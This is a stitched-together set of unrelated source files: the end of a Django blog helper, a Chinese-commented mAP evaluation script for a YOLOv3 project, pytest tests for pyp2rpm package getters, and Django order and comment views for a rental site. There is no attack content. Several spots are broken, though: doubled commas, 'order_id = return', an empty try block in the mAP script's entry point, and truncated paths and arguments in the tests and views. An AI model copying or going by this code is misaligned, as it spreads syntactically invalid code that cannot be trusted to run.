+ ' ' + category['remark'] for category in categorys]) blogs = Blog.objects.all().filter(isDraft=False, isDelete=False).values('id', 'title', 'content') for blog in blogs: titles += blog['title'] + ' ' pattern = re.compile(r'<pre.*?>.*?</pre>', re.S) res = re.sub(pattern, '', blog['content']) if res: pattern = re.compile(r'<.*?>|\n|\r|\t|&nbsp;', re.S) res = re.sub(pattern, '', res) res = html.unescape(res).strip() desc_dict[blog['id']] = res or ' ' desc_dict[0] = titles cache.set('desc_dict', desc_dict, 3600 * 24 * 30) return '张文迪 博客 ' + desc_dict[blog_id] ```
{ "source": "00why00/yolov3-tf2", "score": 2 }
#### File: yolov3-tf2/mAP/ ```python import os import sys import shutil import glob import json import operator import math import cv2 import numpy as np import matplotlib.pyplot as plt from absl import app, flags, logging from absl.flags import FLAGS """ 计算 mAP """ flags.DEFINE_boolean('no_animation', True, 'no animation is shown') flags.DEFINE_boolean('no_plot', True, 'no plot is shown') flags.DEFINE_boolean('quiet', False, 'minimalistic console output') # e.g. python -ignore "person book" flags.DEFINE_spaceseplist('ignore', None, 'ignore a list of classes') # e.g. python -set_class_iou "person 0.7 book 0.6" flags.DEFINE_spaceseplist('set_class_iou', None, 'set IoU for a specific class') # 见 MINOVERLAP = 0.5 ''' 0,0 -------------> x (width) | | (Left,Top) | *_________ | | | | | | y |_________| (height) * (Right,Bottom) ''' def calculate_log_average_miss_rate(precision, recall): """ 在区间 [1e-2, 1]以对数空间均匀分为 9 份,计算平均的 MR :param precision: 精确率 TP / (TP + FP) = TP / n :param recall: 召回率 TP / (TP + FN) = TP / P :return: lamr: log-average miss rate :return: mr: miss rate MR = FN / (TP + FN) = FN / P :return: fppi: false positive per image FPPI = FP / (TP + FP) = FP / n """ # 如果没有此类的预测 if precision.size == 0: lamr = 0 mr = 1 fppi = 0 return lamr, mr, fppi fppi = 1 - precision mr = 1 - recall # 在起止位置插入值防止越界 fppi_tmp = np.insert(fppi, 0, -1.0) mr_tmp = np.insert(mr, 0, 1.0) # 将[1e-2, 1e0]在对数空间均匀分为 9 份 ref = np.logspace(-2.0, 0.0, num=9) for i, ref_i in enumerate(ref): # 因为 ref 的最小值为 0.01,fppi_tmp 的最小值为 -1.0 # 所以一定可以找到至少一个索引 j = np.where(fppi_tmp <= ref_i)[-1][-1] ref[i] = mr_tmp[j] lamr = math.exp(np.mean(np.log(np.maximum(1e-10, ref)))) return lamr, mr, fppi def check_float_between_0_and_1(value): """ 检查数字是不是一个在0和1之间的浮点数 """ try: val = float(value) if 0.0 < val < 1.0: return True else: return False except ValueError: return False def voc_ap(precision, recall): """ 参考: 根据 precision 和 recall 数组计算 AP: 1、计算随着 precision 递减的 Precision-recall 曲线 2、AP 就是 Precision-recall 曲线下面的面积 代码参考 VOC development kit code 中 VOCap.m :param precision: 精确率 TP / (TP + FP) = TP / n :param recall: 召回率 TP / (TP + FN) = TP / P :return: ap: average-precision 平均精度 :return: precision: 横轴 :return: recall: 纵轴 """ # 在 precision 和 recall 数组前后插值 precision.insert(0, 0.0) precision.append(0.0) recall.insert(0, 0.0) recall.append(1.0) # 让 precision 单调递减(从后往前) for i in range(len(precision) - 2, -1, -1): precision[i] = max(precision[i], precision[i + 1]) # 记录 recall 改变的位置 change_list = [] for i in range(1, len(recall)): if recall[i] != recall[i - 1]: change_list.append(i) # 使用数值积分计算 Precision-recall 曲线下面的面积 ap = 0.0 for i in change_list: ap += ((recall[i] - recall[i - 1]) * precision[i]) return ap, precision, recall def file_lines_to_list(path): """ 将文件按行保存成列表 """ with open(path) as f: content = f.readlines() # 去除每一行末尾的 空格 或 \n content = [x.strip() for x in content] return content def draw_text_in_image(img, text, pos, color, line_width): """ 在图片上写字 """ font = cv2.FONT_HERSHEY_PLAIN font_scale = 1 line_type = 1 bottom_left_corner_of_text = pos cv2.putText(img, text, bottom_left_corner_of_text, font, font_scale, color, line_type) text_width, _ = cv2.getTextSize(text, font, font_scale, line_type)[0] return img, (line_width + text_width) def adjust_axes(renderer, text, fig, axes): """ 调整 plot 坐标轴 """ # 计算文字宽度用于重新缩放 box = text.get_window_extent(renderer=renderer) text_width_inches = box.width / fig.dpi # 计算缩放比例 current_fig_width = fig.get_figwidth() new_fig_width = current_fig_width + text_width_inches proportion = new_fig_width / current_fig_width # 设置坐标轴最大值 x_lim = axes.get_xlim() axes.set_xlim([x_lim[0], x_lim[1] * proportion]) def draw_plot_func(dictionary, num_classes, window_title, plot_title, x_label, output_path, if_show, plot_color, tp_bar): """ 使用 Matplotlib 绘图 """ # 降序排列字典的值到元组列表中 sort_dic_by_value = sorted(dictionary.items(), key=operator.itemgetter(1)) # 解压元组列表为两个列表 sorted_keys, sorted_values = zip(*sort_dic_by_value) # 有 TP 数组时 if tp_bar != "": """ 绿色:TP 红色:FP 粉色:FN """ fp_sorted = [] tp_sorted = [] for key in sorted_keys: fp_sorted.append(dictionary[key] - tp_bar[key]) tp_sorted.append(tp_bar[key]) # 绘制水平直方图 plt.barh(range(num_classes), fp_sorted, align='center', color='crimson', label='False Positive') plt.barh(range(num_classes), tp_sorted, align='center', color='forestgreen', label='True Positive', left=fp_sorted) plt.legend(loc='lower right') # 标数值 fig = plt.gcf() axes = plt.gca() renderer = fig.canvas.get_renderer() for i, val in enumerate(sorted_values): fp_val = fp_sorted[i] tp_val = tp_sorted[i] fp_str_val = " " + str(fp_val) tp_str_val = fp_str_val + " " + str(tp_val) text = plt.text(val, i, tp_str_val, color='forestgreen', va='center', fontweight='bold') plt.text(val, i, fp_str_val, color='crimson', va='center', fontweight='bold') if i == (len(sorted_values) - 1): adjust_axes(renderer, text, fig, axes) else: # 绘制水平直方图 plt.barh(range(num_classes), sorted_values, color=plot_color) # 标数值 fig = plt.gcf() axes = plt.gca() renderer = fig.canvas.get_renderer() for i, val in enumerate(sorted_values): str_val = " " + str(val) if val < 1.0: str_val = " {0:.2f}".format(val) text = plt.text(val, i, str_val, color=plot_color, va='center', fontweight='bold') if i == (len(sorted_values) - 1): adjust_axes(renderer, text, fig, axes) # 设置窗口标题 fig.canvas.set_window_title(window_title) # 在 y 轴上写类名 tick_font_size = 12 plt.yticks(range(num_classes), sorted_keys, fontsize=tick_font_size) # 相应的缩放高度 init_height = fig.get_figheight() dpi = fig.dpi height_pt = num_classes * (tick_font_size * 1.4) # 1.4 为间距 height_in = height_pt / dpi top_margin = 0.15 # 百分比 bottom_margin = 0.15 # 百分比 figure_height = height_in / (1 - top_margin - bottom_margin) if figure_height > init_height: fig.set_figheight(figure_height) # 设置图标题 plt.title(plot_title, fontsize=14) # 设置坐标轴名称 plt.xlabel(x_label, fontsize='large') # 适应窗口大小 fig.tight_layout() # 保存图表 fig.savefig(output_path) # 展示 if if_show: plt.close() def main(_argv): # 检查是否有要忽略的类别 if FLAGS.ignore is None: FLAGS.ignore = [] # 设置文件路径 ground_truth_path = os.path.join(os.getcwd(), '../data', 'ground_truth') detection_results_path = os.path.join(os.getcwd(), '../data', 'detection_result') image_path = os.path.join(os.getcwd(), '../data', 'VOCdevkit', 'VOC2012', 'JPEGImages') # 没有图片时设置 no_animation 为 True if os.path.exists(image_path): for root, dirs, files in os.walk(image_path): if not files: FLAGS.no_animation = True else: FLAGS.no_animation = True # 创建 temp 和 output 目录 temp_file_path = '.temp' if not os.path.exists(temp_file_path): os.makedirs(temp_file_path) output_file_path = 'output' if not os.path.exists(output_file_path): os.makedirs(output_file_path) else: shutil.rmtree(output_file_path) os.makedirs(output_file_path) if not FLAGS.no_plot: os.makedirs(os.path.join(output_file_path, 'classes')) if not FLAGS.no_animation: os.makedirs(os.path.join(output_file_path, 'images', 'detections_one_by_one')) """ 获取并解析 ground truth 文件 """ # 得到 ground truth 文件的列表 ground_truth_file_list = glob.glob(ground_truth_path + '/*.txt') if len(ground_truth_file_list) == 0: logging.error("没有找到ground truth文件!") sys.exit(0) ground_truth_file_list.sort() ground_truth_counter_per_class = {} image_counter_per_class = {} ground_truth_file = [] for txt_file in ground_truth_file_list: file_id = txt_file.split(".txt", 1)[0] file_id = os.path.basename(os.path.normpath(file_id)) # 检查是否有对应的 detection result 文件 result_path = os.path.join(detection_results_path, (file_id + '.txt')) if not os.path.exists(result_path): error_msg = "没有找到: {}\n".format(result_path) logging.error(error_msg) sys.exit(0) lines_list = file_lines_to_list(txt_file) # 创建 ground truth 的字典 bounding_boxes = [] already_seen_classes = [] for line in lines_list: try: if "difficult" in line: class_name, left, top, right, bottom, _difficult = line.split() is_difficult = True else: class_name, left, top, right, bottom = line.split() is_difficult = False except ValueError: error_msg = txt_file + "格式错误" logging.error(error_msg) sys.exit(0) # 检查是否有忽略的类 if class_name in FLAGS.ignore: continue bbox = left + " " + top + " " + right + " " + bottom bounding_boxes.append({"class_name": class_name, "bbox": bbox, "used": False, "difficult": is_difficult}) # 对于难识别的物体,不计算 if not is_difficult: # 对每个类的标记进行计数 if class_name in ground_truth_counter_per_class: ground_truth_counter_per_class[class_name] += 1 else: ground_truth_counter_per_class[class_name] = 1 # 对每个类的图片进行计数 if class_name not in already_seen_classes: if class_name in image_counter_per_class: image_counter_per_class[class_name] += 1 else: image_counter_per_class[class_name] = 1 already_seen_classes.append(class_name) # 将 bounding box 保存为 json 文件 temp_file = temp_file_path + "/" + file_id + "_ground_truth.json" ground_truth_file.append(temp_file) with open(temp_file, 'w') as outfile: json.dump(bounding_boxes, outfile) ground_truth_classes = list(ground_truth_counter_per_class.keys()) ground_truth_classes = sorted(ground_truth_classes) num_classes = len(ground_truth_classes) # 检查是否设置了某个类别的 IoU iou_list = [] if FLAGS.set_class_iou is not None: num_args = len(FLAGS.set_class_iou) if num_args % 2 != 0: logging.error("输入参数个数不为2的倍数!") sys.exit(0) special_iou_classes = FLAGS.set_class_iou[::2] iou_list = FLAGS.set_class_iou[1::2] for tmp_class in special_iou_classes: if tmp_class not in ground_truth_classes: logging.error("未知的类:" + tmp_class) sys.exit(0) for tmp_iou in iou_list: if not check_float_between_0_and_1(tmp_iou): logging.error("错误的IoU值:" + tmp_iou) sys.exit(0) """ 获取并解析 detection result 文件 """ # 得到 detection result 文件的列表 detection_results_file_list = glob.glob(detection_results_path + '/*.txt') detection_results_file_list.sort() for class_index, class_name in enumerate(ground_truth_classes): bounding_boxes = [] for txt_file in detection_results_file_list: file_id = txt_file.split(".txt", 1)[0] file_id = os.path.basename(os.path.normpath(file_id)) # 检查是否有对应的 ground truth 文件 truth_path = os.path.join(ground_truth_path, (file_id + '.txt')) if class_index == 0 and not os.path.exists(truth_path): error_msg = "没有找到: {}\n".format(truth_path) logging.error(error_msg) sys.exit(0) lines_list = file_lines_to_list(txt_file) for line in lines_list: try: predict_class_name, confidence, left, top, right, bottom = line.split() except ValueError: error_msg = txt_file + "格式错误" logging.error(error_msg) sys.exit(0) if predict_class_name == class_name: bbox = left + " " + top + " " + right + " " + bottom bounding_boxes.append({"confidence": confidence, "bbox": bbox, "file_id": file_id}) # 根据置信度降序排列 detection result bounding_boxes.sort(key=lambda x: float(x['confidence']), reverse=True) # 保存为 json 文件 with open(temp_file_path + '/' + class_name + "_detection_result.json", 'w') as outfile: json.dump(bounding_boxes, outfile) """ 计算每个类的 AP """ sum_ap = 0.0 ap_dictionary = {} lamr_dictionary = {} # 保存输出 with open(output_file_path + "/output.txt", 'w') as output_file: output_file.write("# AP and precision/recall per class\n") true_positive_count = {} for class_index, class_name in enumerate(ground_truth_classes): true_positive_count[class_name] = 0 # 加载对应类的 detection result detection_results_file = temp_file_path + '/' + class_name + "_detection_result.json" detection_results_data = json.load(open(detection_results_file)) num_data = len(detection_results_data) tp = [0] * num_data fp = [0] * num_data for index, detection in enumerate(detection_results_data): file_id = detection["file_id"] if not FLAGS.no_animation: # 找到对应图片 ground_truth_image = glob.glob1(image_path, file_id + ".*") if len(ground_truth_image) == 0: logging.error("没有找到图片:" + file_id) sys.exit(0) elif len(ground_truth_image) > 1: logging.error("找到多张图片:" + file_id) sys.exit(0) else: # 加载图片 img = cv2.imread(image_path + '/' + ground_truth_image[0]) # 加载带有预测框的图片 img_cumulative_path = output_file_path + "/images/" + ground_truth_image[0] if os.path.isfile(img_cumulative_path): img_cumulative = cv2.imread(img_cumulative_path) else: img_cumulative = img.copy() # 给图片添加底边 bottom_border = 60 black = [0, 0, 0] img = cv2.copyMakeBorder(img, 0, bottom_border, 0, 0, cv2.BORDER_CONSTANT, value=black) # 加载对应的 ground truth 文件 ground_truth_file = temp_file_path + "/" + file_id + "_ground_truth.json" ground_truth_data = json.load(open(ground_truth_file)) iou_max = -1 ground_truth_match = -1 # 加载预测框 bounding_box_dr = [float(x) for x in detection["bbox"].split()] for obj in ground_truth_data: # 查看类别名是否匹配 if obj["class_name"] == class_name: # 加载标记框 bounding_box_gt = [float(x) for x in obj["bbox"].split()] bounding_box_intersection = [max(bounding_box_dr[0], bounding_box_gt[0]), max(bounding_box_dr[1], bounding_box_gt[1]), min(bounding_box_dr[2], bounding_box_gt[2]), min(bounding_box_dr[3], bounding_box_gt[3])] intersection_width = bounding_box_intersection[2] - bounding_box_intersection[0] + 1 intersection_height = bounding_box_intersection[3] - bounding_box_intersection[1] + 1 if intersection_width > 0 and intersection_height > 0: union = (bounding_box_dr[2] - bounding_box_dr[0] + 1) * \ (bounding_box_dr[3] - bounding_box_dr[1] + 1) + \ (bounding_box_gt[2] - bounding_box_gt[0] + 1) * \ (bounding_box_gt[3] - bounding_box_gt[1] + 1) - \ intersection_width * intersection_height iou = intersection_width * intersection_height / union if iou > iou_max: iou_max = iou ground_truth_match = obj # 认为识别结果为 TP if not FLAGS.no_animation: status = "没有找到匹配项!" min_overlap = MINOVERLAP if FLAGS.set_class_iou is not None: if class_name in FLAGS.set_class_iou: iou_index = FLAGS.set_class_iou.index(class_name) min_overlap = float(iou_list[iou_index]) if iou_max >= min_overlap: if not ground_truth_match['difficult']: if not bool(ground_truth_match["used"]): # TP tp[index] = 1 ground_truth_match["used"] = True true_positive_count[class_name] += 1 # 更新 json 文件 with open(ground_truth_file, 'w') as f: f.write(json.dumps(ground_truth_data)) if not FLAGS.no_animation: status = "匹配成功!" else: # FP 多次识别 fp[index] = 1 if iou_max > 0: status = "重复匹配!" else: # FP fp[index] = 1 if iou_max > 0: status = "overlap 不足" # 显示动画 if not FLAGS.no_animation: height, width = img.shape[:2] # 颜色 BGR white = (255, 255, 255) light_blue = (255, 200, 100) green = (0, 255, 0) light_red = (30, 30, 255) # 第一条线 margin = 10 v_pos = int(height - margin - (bottom_border / 2.0)) text = "Image: " + ground_truth_image[0] + " " img, line_width = draw_text_in_image(img, text, (margin, v_pos), white, 0) text = "Class [" + str(class_index) + "/" + str(num_classes) + "]: " + class_name + " " img, line_width = draw_text_in_image(img, text, (margin + line_width, v_pos), light_blue, line_width) if iou_max != -1: color = light_red if status == "overlap 不足": text = "IoU: {0:.2f}% ".format(iou_max * 100) + "< {0:.2f}% ".format(min_overlap * 100) else: text = "IoU: {0:.2f}% ".format(iou_max * 100) + ">= {0:.2f}% ".format(min_overlap * 100) color = green img, _ = draw_text_in_image(img, text, (margin + line_width, v_pos), color, line_width) # 第二条线 v_pos += int(bottom_border / 2.0) rank_pos = str(index + 1) text = "Detection #rank: " + rank_pos + \ " confidence: {0:.2f}% ".format(float(detection["confidence"]) * 100) img, line_width = draw_text_in_image(img, text, (margin, v_pos), white, 0) color = light_red if status == "匹配成功!": color = green text = "Result: " + status + " " img, line_width = draw_text_in_image(img, text, (margin + line_width, v_pos), color, line_width) font = cv2.FONT_HERSHEY_SIMPLEX # 如果预测框和标记框有交集 if iou_max > 0: bounding_box_gt = [int(round(float(x))) for x in ground_truth_match["bbox"].split()] cv2.rectangle(img, (bounding_box_gt[0], bounding_box_gt[1]), (bounding_box_gt[2], bounding_box_gt[3]), light_blue, 2) cv2.rectangle(img_cumulative, (bounding_box_gt[0], bounding_box_gt[1]), (bounding_box_gt[2], bounding_box_gt[3]), light_blue, 2) cv2.putText(img_cumulative, class_name, (bounding_box_gt[0], bounding_box_gt[1] - 5), font, 0.6, light_blue, 1, cv2.LINE_AA) bounding_box_dr = [int(i) for i in bounding_box_dr] cv2.rectangle(img, (bounding_box_dr[0], bounding_box_dr[1]), (bounding_box_dr[2], bounding_box_dr[3]), color, 2) cv2.rectangle(img_cumulative, (bounding_box_dr[0], bounding_box_dr[1]), (bounding_box_dr[2], bounding_box_dr[3]), color, 2) cv2.putText(img_cumulative, class_name, (bounding_box_dr[0], bounding_box_dr[1] - 5), font, 0.6, color, 1, cv2.LINE_AA) # 展示图片 cv2.imshow("Animation", img) cv2.waitKey(20) # 保存图片 output_image_path = (output_file_path + "/images/detections_one_by_one/" + class_name + "_detection" + str(index) + ".jpg") cv2.imwrite(output_image_path, img) cv2.imwrite(img_cumulative_path, img_cumulative) # 计算 precision / recall cumsum = 0 for index, val in enumerate(fp): fp[index] += cumsum cumsum += val cumsum = 0 for index, val in enumerate(tp): tp[index] += cumsum cumsum += val # TODO: 使用 numpy 代替 list recall = tp[:] for index, val in enumerate(tp): # noinspection PyTypeChecker recall[index] = float(tp[index]) / ground_truth_counter_per_class[class_name] precision = tp[:] for index, val in enumerate(tp): # noinspection PyTypeChecker precision[index] = float(tp[index]) / (fp[index] + tp[index]) ap, m_precision, m_recall = voc_ap(precision[:], recall[:]) sum_ap += ap text = "{0:.2f}%".format(ap * 100) + " = " + class_name + " AP " # 写入输出文件 rounded_precision = ['%.2f' % elem for elem in precision] rounded_recall = ['%.2f' % elem for elem in recall] output_file.write(text + "\n Precision: " + str(rounded_precision) + "\n Recall :" + str(rounded_recall) + "\n\n") if not FLAGS.quiet: print(text) ap_dictionary[class_name] = ap _num_images = image_counter_per_class[class_name] lamr, mr, fppi = calculate_log_average_miss_rate(np.array(precision), np.array(recall)) lamr_dictionary[class_name] = lamr # 画图表 if not FLAGS.no_plot: plt.plot(recall, precision, '-o') # 在 list 倒数第二位置添加一点 (m_recall[-2], 0.0),因为最后的一段不影响 AP 的值 area_under_curve_x = m_recall[:-1] + [m_recall[-2] + m_recall[-1]] area_under_curve_y = m_precision[:-1] + [0.0] + [m_precision[-1]] plt.fill_between(area_under_curve_x, 0, area_under_curve_y, alpha=0.2, edgecolor='r') # 设置窗口标题 fig = plt.gcf() fig.canvas.set_window_title('AP ' + class_name) # 设置图表标题 plt.title('class:' + text) # 设置坐标轴名称 plt.xlabel('Recall') plt.ylabel('Precision') # 设置坐标轴 axes = plt.gca() axes.set_xlim([0.0, 1.0]) axes.set_ylim([0.0, 1.05]) # 保存图表 fig.savefig(output_file_path + "/classes/" + class_name + ".png") plt.cla() if not FLAGS.no_animation: cv2.destroyAllWindows() output_file.write("\n# mAP of all classes\n") m_ap = sum_ap / num_classes text = "mAP = {0:.2f}%".format(m_ap * 100) output_file.write(text + "\n") print(text) # FP if not FLAGS.no_animation: pink = (203, 192, 255) for tmp_file in ground_truth_file: ground_truth_data = json.load(open(tmp_file)) start = temp_file_path + '/' img_id = tmp_file[tmp_file.find(start) + len(start): tmp_file.rfind('_ground_truth.json')] img_cumulative_path = output_file_path + "/images/" + img_id + ".jpg" img = cv2.imread(img_cumulative_path) if img is None: img_path = image_path + '/' + img_id + ".jpg" img = cv2.imread(img_path) # 画 FP for obj in ground_truth_data: if not obj['used']: bounding_box_gt = [int(round(float(x))) for x in obj["bbox"].split()] cv2.rectangle(img, (bounding_box_gt[0], bounding_box_gt[1]), (bounding_box_gt[2], bounding_box_gt[3]), pink, 2) cv2.imwrite(img_cumulative_path, img) # 计算 detection result 总数 detection_result_counter_per_class = {} for txt_file in detection_results_file_list: lines_list = file_lines_to_list(txt_file) for line in lines_list: class_name = line.split()[0] if class_name in FLAGS.ignore: continue if class_name in detection_result_counter_per_class: detection_result_counter_per_class[class_name] += 1 else: detection_result_counter_per_class[class_name] = 1 detection_result_classes = list(detection_result_counter_per_class.keys()) # 做 ground truth 中每个类的个数的图表 if not FLAGS.no_plot: window_title = "ground-truth-info" plot_title = "ground-truth\n" plot_title += "(" + str(len(ground_truth_file_list)) + " files and " + str(num_classes) + " classes)" x_label = "Number of objects per class" output_path = output_file_path + "/ground-truth-info.png" to_show = False plot_color = 'forestgreen' draw_plot_func(ground_truth_counter_per_class, num_classes, window_title, plot_title, x_label, output_path, to_show, plot_color, '') # 保存 ground truth 中每个类的个数到 output.txt with open(output_file_path + "/output.txt", 'a') as output_file: output_file.write("\n# Number of ground-truth objects per class\n") for class_name in sorted(ground_truth_counter_per_class): output_file.write(class_name + ": " + str(ground_truth_counter_per_class[class_name]) + "\n") # 完成对 TP 计数 for class_name in detection_result_classes: # 如果在 detection result 但是没有在 ground truth 里,说明这个类里没有 TP if class_name not in ground_truth_classes: true_positive_count[class_name] = 0 # 做 detection result 中每个类的个数的图表 if not FLAGS.no_plot: window_title = "detection-results-info" plot_title = "detection-results\n" plot_title += "(" + str(len(detection_results_file_list)) + " files and " count_non_zero_values_in_dictionary = sum(int(x) > 0 for x in list(detection_result_counter_per_class.values())) plot_title += str(count_non_zero_values_in_dictionary) + " detected classes)" x_label = "Number of objects per class" output_path = output_file_path + "/detection-results-info.png" to_show = False plot_color = 'forestgreen' true_positive_bar = true_positive_count draw_plot_func(detection_result_counter_per_class, len(detection_result_counter_per_class), window_title, plot_title, x_label, output_path, to_show, plot_color, true_positive_bar) # 保存 detection result 中每个类的个数到 output.txt with open(output_file_path + "/output.txt", 'a') as output_file: output_file.write("\n# Number of detected objects per class\n") for class_name in sorted(detection_result_classes): output_file.write(class_name + ": " + str(detection_result_counter_per_class[class_name]) + " (tp:" + str(true_positive_count[class_name]) + ", fp:" + str(detection_result_counter_per_class[class_name] - true_positive_count[class_name]) + ")\n") # log-average miss rate if not FLAGS.no_plot: window_title = "lamr" plot_title = "log-average miss rate" x_label = "log-average miss rate" output_path = output_file_path + "/lamr.png" to_show = False plot_color = 'royalblue' draw_plot_func(lamr_dictionary, num_classes, window_title, plot_title, x_label, output_path, to_show, plot_color, "") # mAP if not FLAGS.no_plot: window_title = "mAP" plot_title = "mAP = {0:.2f}%".format(m_ap * 100) x_label = "Average Precision" output_path = output_file_path + "/mAP.png" to_show = True plot_color = 'royalblue' draw_plot_func(ap_dictionary, num_classes, window_title, plot_title, x_label, output_path, to_show, plot_color, "") # 删除 temp 文件夹 shutil.rmtree(temp_file_path) if __name__ == '__main__': try: except SystemExit: pass ```
{ "source": "00willo/pyp2rpm", "score": 2 }
#### File: pyp2rpm/tests/ ```python import os import tempfile import shutil import pytest from flexmock import flexmock try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib from pyp2rpm.package_getters import LocalFileGetter, PypiDownloader, get_url from pyp2rpm.exceptions import MissingUrlException, NoSuchPackageException from pyp2rpm import settings tests_dir = os.path.split(os.path.abspath(__file__))[0] class TestPackageGetters(object): client = xmlrpclib.ServerProxy(settings.PYPI_URL) @pytest.mark.parametrize(('name', 'version', 'wheel', 'hf', 'expected_url', 'expected_md5'), [ ('setuptools', '18.3.1', False, False, '', '748187b93152fa60287dfb896837fd7c'), ('setuptools', '18.3.1', True, False, '', 'a21a4d02d0bab2eac499cca72faeb076'), ('setuptools', '18.3.1', False, True, '', '748187b93152fa60287dfb896837fd7c'), ('pypandoc', '1.1.3', False, False, '', '771f376bf9c936a90159cd94235998c2'), ]) @pytest.mark.webtest def test_get_url(self, name, version, wheel, hf, expected_url, expected_md5): assert (expected_url, expected_md5) == get_url( self.client, name, version, wheel, hf) @pytest.mark.parametrize(('name', 'version', 'wheel', 'hf', 'exception', 'error_msg'), [ ('nonexistent_pkg', '0.0.0', False, False, MissingUrlException, 'Url of source archive not found.'), ('Pymacs', '0.25', False, False, MissingUrlException, 'Pymacs package has no sources on PyPI, Please ask the maintainer to upload sources.'), ]) @pytest.mark.webtest def test_get_url_raises(self, name, version, wheel, hf, exception, error_msg): with pytest.raises(exception) as exc_info: get_url(self.client, name, version, wheel, hf) assert error_msg == str(exc_info.value) class TestPypiFileGetter(object): client = flexmock( package_releases=lambda n, hidden: n == 'spam' and ['3.rc1', '2', '1'] or [], release_urls=lambda n, v: n == 'spam' and v in [ '3.rc1', '2', '1'] and [{'url': 'spam'}] or [] ) @pytest.mark.parametrize(('name', 'version'), [ ('eggs', '2'), ('spam', '3'), ]) def test_init_bad_data(self, name, version): with pytest.raises(NoSuchPackageException): PypiDownloader(self.client, name, version) @pytest.mark.parametrize(('name', 'version', 'expected_ver'), [ ('spam', '1', '1'), ('spam', None, '2'), ]) def test_init_good_data(self, name, version, expected_ver): d = PypiDownloader(self.client, name, version) assert d.version == expected_ver @pytest.mark.parametrize(('name', 'version', 'expected_ver'), [ ('spam', '1', '1'), ('spam', None, '3.rc1'), ]) def test_init_good_data_pre(self, name, version, expected_ver): d = PypiDownloader(self.client, name, version, prerelease=True) assert d.version == expected_ver class TestLocalFileGetter(object): td_dir = '{0}/test_data/'.format(tests_dir) def setup_method(self, method): self.l = [LocalFileGetter('{0}plumbum-0.9.0.tar.gz'.format( self.td_dir)), LocalFileGetter('{0}Sphinx-1.1.3-py2.6.egg'.format( self.td_dir)), LocalFileGetter('{0}unextractable-1.tar'.format( self.td_dir)), LocalFileGetter( '{0}setuptools-19.6-py2.py3-none-any.whl'.format( self.td_dir)), LocalFileGetter( '{0}py2exe-'.format( self.td_dir)), LocalFileGetter('python-foo-1.tar'), LocalFileGetter('python-many-dashes-foo-1.tar'), ] def teardown_method(self, method): for file_getter in self.l: if hasattr(file_getter, 'temp_dir'): shutil.rmtree(file_getter.temp_dir) @pytest.mark.parametrize(('i', 'expected'), [ (0, 'plumbum-0.9.0'), (1, 'Sphinx-1.1.3-py2.6'), (2, 'unextractable-1'), (3, 'setuptools-19.6-py2.py3-none-any'), (4, 'py2exe-'), ]) def test_stripped_name_version(self, i, expected): assert self.l[i]._stripped_name_version == expected @pytest.mark.parametrize(('i', 'expected'), [ (0, ('plumbum', '0.9.0')), (1, ('Sphinx', '1.1.3')), (3, ('setuptools', '19.6')), (4, ('py2exe', '')), (5, ('python-foo', '1')), (6, ('python-many-dashes-foo', '1')), ]) def test_get_name_version(self, i, expected): assert self.l[i].get_name_version() == expected def test_get_non_existent_file(self): with pytest.raises(EnvironmentError): LocalFileGetter('/this/path/doesnot/exist', tempfile.gettempdir()).get() def test_get_existent_file(self): tmpdir = tempfile.gettempdir() in_tmp_dir = os.path.join(tmpdir, 'plumbum-0.9.0.tar.gz') self.l[0].save_dir = tmpdir if os.path.exists(in_tmp_dir): os.unlink(in_tmp_dir) assert self.l[0].get() == in_tmp_dir assert os.path.exists(self.l[0].get()) os.unlink(in_tmp_dir) def test_get_to_same_location(self): tmpdir = tempfile.gettempdir() self.l[1].save_dir = self.td_dir assert os.path.samefile(self.l[1].get(), os.path.join( self.td_dir, 'Sphinx-1.1.3-py2.6.egg')) assert not os.path.exists(os.path.join(tmpdir, 'Sphinx-1.1.3-py2.6.egg')) ```
{ "source": "00wsmart00/ihome_project", "score": 2 }
#### File: apps/order/ ```python import datetime import json from django import http from django.shortcuts import render # Create your views here. from django.views import View from houses.models import House from ihome.utils.response_code import RET from order.models import Order class OrderView(View): """订单""" def post(self, request): """添加订单""" json_dict = json.loads(request.body.decode()) house_id = json_dict.get('house_id') start_date = json_dict.get('start_date') end_date = json_dict.get('end_date') date1 = datetime.datetime.strptime(start_date, "%Y-%m-%d") date2 = datetime.datetime.strptime(end_date, "%Y-%m-%d") days = (date2 - date1).days house_price = House.objects.get(id=house_id).price amount = days * house_price # 保存订单数据 try: order_house = Order.objects.create( house_id=house_id, begin_date=start_date, end_date=end_date,, days=days, house_price=house_price, amount=amount ) except Exception as e: print(e) return http.JsonResponse({ "errno": RET.DBERR, "errmsg": "保存订单失败" }) order_id = return http.JsonResponse({ "errno": RET.OK, "errmsg": "保存订单成功", "data": {"order_id": order_id} }) def get(self, request): """获取订单""" json_dict = request.GET role = json_dict.get('role') user = request.user data = dict() orders_list = [] if role == 'custom': try: orders = Order.objects.filter( except Order.DoesNotExist: return http.JsonResponse({ "errno": RET.DBERR, "errmsg": "数据不存在" }) else: try: orders = Order.objects.filter(house_id__in=user.house_set.all()) except Order.DoesNotExist: return http.JsonResponse({ "errno": RET.DBERR, "errmsg": "数据不存在" }) for order in orders: order_dict = dict() try: order_dict['amount'] = order.amount order_dict['comment'] = order.comment order_dict['ctime'] = order.create_time order_dict['days'] = order.days order_dict['end_date'] = order.end_date order_dict['img_url'] = order_dict['order_id'] = order_dict['start_date'] = order.begin_date order_dict['status'] = order.status order_dict['title'] = orders_list.append(order_dict) data["orders"] = orders_list except Exception as e: print(e) return http.JsonResponse({ "errmsg": "数据查询错误", "errno": RET.DBERR }) return http.JsonResponse({ "data": data, "errmsg": "OK", "errno": RET.OK }) # 订单处理 def put(self, request): json_dict = json.loads(request.body.decode()) action = json_dict.get("action") order_id = json_dict.get('order_id') reason = json_dict.get('reason') if action == 'reject': try: order = Order.objects.get(id=order_id) order.status = Order.ORDER_STATUS_CHOICES[6][0] order.comment = reason except Exception as e: print(e) return http.JsonResponse({ "errmsg": "更新数据失败", "errno": RET.DBERR }) else: try: order = Order.objects.get(id=order_id) order.status = Order.ORDER_STATUS_CHOICES[3][0] except Exception as e: print(e) return http.JsonResponse({ "errmsg": "更新数据失败", "errno": RET.DBERR }) return http.JsonResponse({ "errno": RET.OK, "errmsg": "OK" }) class CommentView(View): """客户评论""" def put(self, request): json_dict = json.loads(request.body.decode()) comment = json_dict.get('comment') order_id = json_dict.get('order_id') try: order = Order.objects.get(id=order_id) order.status = Order.ORDER_STATUS_CHOICES[4][0] order.comment = comment except Exception as e: print(e) return http.JsonResponse({ "errmsg": "更新数据失败", "errno": RET.DBERR }) return http.JsonResponse({ "errno": RET.OK, "errmsg": "OK" }) ```
